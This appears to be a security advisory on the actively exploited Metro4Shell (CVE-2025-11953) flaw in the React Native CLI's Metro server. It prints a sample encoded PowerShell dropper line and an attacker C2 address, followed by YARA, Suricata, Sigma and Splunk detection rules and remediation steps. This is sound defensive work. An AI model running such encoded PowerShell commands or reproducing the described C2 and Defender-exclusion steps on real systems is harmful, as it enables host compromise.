Intro

A critical remote code execution vulnerability is being actively exploited in the wild, targeting the Metro Development Server used by the “@react-native-community/cli” npm package. CVE-2025-11953, tracked as “Metro4Shell,” enables unauthenticated attackers to execute arbitrary operating system commands on exposed hosts, with confirmed real-world exploitation observed since late December 2025.

📌 CVE Context

– Affected Product: @react-native-community/cli
– Affected Component: Metro Development Server
– Disclosure Timeline: Vulnerability disclosed by JFrog in November 2025; in-the-wild exploitation observed December 21, 2025
– Attack Vector: Network-based
– Authentication Required: None
– Impact: Arbitrary OS command execution

CVSS Metric Breakdown (v4.0) - CVE-2025-11953 (Metro development server remote command execution)
Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): None
User Interaction (UI): None
Confidentiality Impact (VC): High
Integrity Impact (VI): High
Availability Impact (VA): High
Scope Changed (SC): Unchanged
Safety Impact (SI): None
Automation (SA): High
Exploit Maturity: High
Base Score: 9.8 (Critical)

Observed exploitation includes consistent payload delivery across multiple weeks, indicating operational use rather than opportunistic scanning. No public victim attribution is available at this time.

🎯 EPSS Scoring

EPSS Probability: 0.00405
EPSS Percentile: 60.625%
Model Date: Feb 3, 2026
Context:
This score indicates a relatively low absolute probability of widespread exploitation across the global internet.
However, the percentile ranking places this vulnerability above average compared to other CVEs tracked by EPSS.
This gap between low probability and confirmed in-the-wild exploitation highlights a key limitation of purely
statistical models: targeted, niche, or developer-environment exploits may remain operationally dangerous
despite modest global prevalence.

🔬 Exploitation Detail

Attackers exploit the Metro development server by sending a crafted request that results in command execution on the host. Payloads observed in the wild are Base64-encoded PowerShell commands designed to reduce host defenses and establish outbound command-and-control communications.

powershell -e JABQAHIAbwBjAGUAcwBzACAAPQAgACcAcABvAHcAZQByAHMAaABlAGwAbAAnAA==

📎 Attacker Behavior Snapshot

– Initial malicious request triggers command execution
– PowerShell modifies Microsoft Defender exclusions for working and temp directories
– Host establishes raw TCP connection to attacker infrastructure (8.218.43[.]248:60124)
– Secondary Rust-based binary is downloaded and executed from the Temp directory

🧩 Why This Matters

This vulnerability highlights how legacy configurations become high-value targets. Development infrastructure becomes production infrastructure the moment it is reachable, regardless of intent.

Exploitation results in:

• Full command execution on development or CI hosts
• Security control bypass via Defender exclusions
• Deployment of evasive Rust-based malware

🧩 MITRE ATT&CK Mapping

Initial Access: T1190 – Exploit Public-Facing Application
Execution: T1059.001 – PowerShell
Persistence: T1505.003 – Server Software Component

🧪 Detection Rules

YARA Rule (Memory/Doc/PCAP)

rule Metro4Shell_Rust_Payload
{
    meta:
        description = "Detects Metro4Shell PowerShell dropper activity"
    strings:
        $ps1 = "powershell -e"
        $c2 = "8.218.43.248:60124"
    condition:
        all of them
}

Suricata or Zeek (Network)

alert tcp any any -> any 60124 (msg:"Metro4Shell outbound C2 connection"; flow:to_server; classtype:trojan-activity; sid:202511953;)

Sigma Rule (SIEM/EDR)

title: Metro4Shell PowerShell Execution
logsource:
  product: windows
  service: security
detection:
  selection:
    EventID: 4688
    NewProcessName|contains: "powershell"
    CommandLine|contains: "-e"
  condition: selection
level: high

🔎 Detection Strategies

✅ Network Detection:

• Outbound TCP connections to non-standard ports such as 60124
• High-entropy Base64 payloads in HTTP requests
• Unexpected traffic originating from development servers

✅ Endpoint Detection:

• PowerShell spawned by npm, node, or Metro processes
• Defender exclusion modifications
• Rust binaries executing from AppData or Temp directories

⚡ Splunk Query

index=windows EventCode=4688
(CommandLine="*powershell -e*" OR CommandLine="*8.218.43.248*")
| stats count by host, ParentProcessName, NewProcessName, CommandLine

🛠️ SOC Detection Strategy

– Prioritize alerts involving PowerShell execution on development hosts
– Correlate Defender configuration changes with suspicious outbound traffic
– Escalate events involving Rust binary execution from temp directories

🛠️ Tools & Techniques

Tool | Usage
Sysmon | Parent-child and network connection visibility
Velociraptor | Endpoint hunting and artifact collection
Zeek | Detection of abnormal TCP connections
Sigma/YARA | Cross-platform behavioral detection

🛡️ Mitigation & Response

– Patch or upgrade @react-native-community/cli immediately
– Restrict Metro development servers from internet exposure
– Monitor and revert unauthorized Defender exclusions
– Enforce outbound firewall rules for dev environments
– Conduct credential rotation if compromise is suspected

📋 Incident Response Snippets

– Review PowerShell command-line logs for encoded execution
– Audit Defender exclusions using Get-MpPreference
– Investigate AppData and Temp directories for unknown executables
– Validate no lateral movement occurred post-exploitation

📚 Suggested Reading & External References

– Microsoft Security Advisory: CVE-2025-11953
– VulnCheck Exploitation Report (December 2025)
– JFrog Metro4Shell Technical Writeup
– React Native Metro Repository

🗾️ Final Thoughts

Metro4Shell demonstrates how exposed development tooling becomes a direct attack surface once reachable.

Patch exposed systems immediately and treat dev infrastructure as hostile terrain.

Published: Feb 3, 2026